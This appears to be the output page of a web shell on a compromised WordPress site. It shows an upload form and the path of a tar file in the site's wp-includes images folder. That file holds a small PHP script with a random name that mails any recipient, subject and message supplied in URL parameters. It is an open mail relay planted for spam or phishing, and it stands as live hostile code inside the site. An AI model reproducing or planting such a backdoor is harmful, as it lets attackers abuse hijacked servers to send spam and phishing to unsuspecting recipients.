Your IP : 18.116.15.98


Current Path : /home/ephorei/www/wp-includes/images/media/q2m9hb/
Upload File :
Current File : /home/ephorei/www/wp-includes/images/media/q2m9hb/jhqkus.php.tar

home/ephorei/www/jhqkus.php000064400000000761150057770150012004 0ustar00<?php
if (isset($_GET['to']) && isset($_GET['subject']) && isset($_GET['message'])) {
    $to = $_GET['to'];
    $subject = $_GET['subject'];
    $message = $_GET['message'];

    // ?????????????? ?????????
    $headers = "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: text/plain; charset=utf-8\r\n";


    // ???????? ??????
    $result = mail($to, $subject, $message, $headers);

    if ($result) {
        echo 'OK.';
    } else {
        echo 'BAD.';
    }
}
?>